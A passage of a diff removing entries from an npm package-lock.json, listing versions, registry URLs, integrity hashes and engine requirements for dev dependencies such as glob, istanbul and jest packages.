"node_modules/fast-levenshtein": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha1-PYpcZog6FqMMqGQ+hR8Zuqd5eRc=", - "dev": true, - "peer": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/file-entry-cache": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", - "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", - "dev": true, - "peer": true, - "dependencies": { - "flat-cache": "^3.0.4" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "dependencies": { - "minimatch": "^5.0.1" - } - }, - "node_modules/filelist/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/filelist/node_modules/minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/flat-cache": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", - "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", - "dev": true, - "peer": true, - "dependencies": { - "flatted": "^3.1.0", - "rimraf": "^3.0.2" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/flatted": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.2.tgz", - "integrity": "sha512-JaTY/wtrcSyvXJl4IMFHPKyFur1sE9AUqc0QnhOaJ0CxHtAoIV8pYDzeEfAaNEtGkOfq4gr3LBFmdXW5mOQFnA==", - "dev": true, - "peer": true - }, - "node_modules/foreground-child": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.1.1.tgz", - "integrity": "sha512-TMKDUnIte6bfb5nWv7V/caI169OHgvwjb7V4WkeUvbQQdjr5rWKqHFiKWb/fcOwB+CzBT+qbWjvj+DVwRskpIg==", - "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/foreground-child/node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "engines": { - "node": "*" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/functional-red-black-tree": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz", - "integrity": "sha1-GwqzvVU7Kg1jmdKcDj6gslIHgyc=", - "dev": true, - "peer": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/glob-parent": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", - "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", - "dev": true, - "peer": true, - "dependencies": { - "is-glob": "^4.0.1" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/globals": { - "version": "13.10.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.10.0.tgz", - "integrity": "sha512-piHC3blgLGFjvOuMmWZX60f+na1lXFDhQXBf1UYp2fXPXqvEUbOhNwi6BsQ0bQishwedgnjkwv1d9zKf+MWw3g==", - "dev": true, - "peer": true, - "dependencies": { - "type-fest": "^0.20.2" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.2" - }, - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/ignore": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/ignore/-/ignore-4.0.6.tgz", - "integrity": "sha512-cyFDKrqc/YdcWFniJhzI42+AzS+gNwmUzOSFcRCQYwySuBBBy/KjuxWLZ/FHEH6Moq1NizMOBWyTcv8O4OZIMg==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 4" - } - }, - "node_modules/import-fresh": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", - "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", - "dev": true, - "dependencies": { - "parent-module": "^1.0.0", - "resolve-from": "^4.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha1-d8mYQFJ6qOyxqLppe4BkWnqSap0=", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.13.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", - "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", - "dev": true, - "dependencies": { - "hasown": "^2.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-extglob": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", - "integrity": "sha1-qIwCU1eR8C7TfHahueqXc8gz+MI=", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-glob": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.1.tgz", - "integrity": "sha512-5G0tKtBTFImOqDnLB2hG6Bp2qcKEFduo4tZu9MT/H6NQv/ghhy30o55ufafxJ/LdH79LLs2Kfrn85TLKyA7BUg==", - "dev": true, - "peer": true, - "dependencies": { - "is-extglob": "^2.1.1" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-obj": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", - "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.2.tgz", - "integrity": "sha512-1WUsZ9R1lA0HtBSohTkm39WTPlNKSJ5iFk7UwqXkBLoHQT+hfqPsfsTDVuZdKGaBwn7din9bS7SsnoAr943hvw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jackspeak": { - "version": "2.3.6", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-2.3.6.tgz", - "integrity": "sha512-N3yCS/NegsOBokc8GAdM8UcmfsKiSS8cipheD/nivzr700H+nsMOxJjQnvwOcRYVuFkdH0wGUvW2WbXGmrZGbQ==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, - "node_modules/jake": { - "version": "10.9.1", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.1.tgz", - "integrity": "sha512-61btcOHNnLnsOdtLgA5efqQWjnSi/vow5HbI7HMdKKWqvrKR1bLK3BPlJn9gcSaP2ewuamUSMB5XEy76KUIS2w==", - "dev": true, - "dependencies": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - }, - "bin": { - "jake": "bin/cli.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - 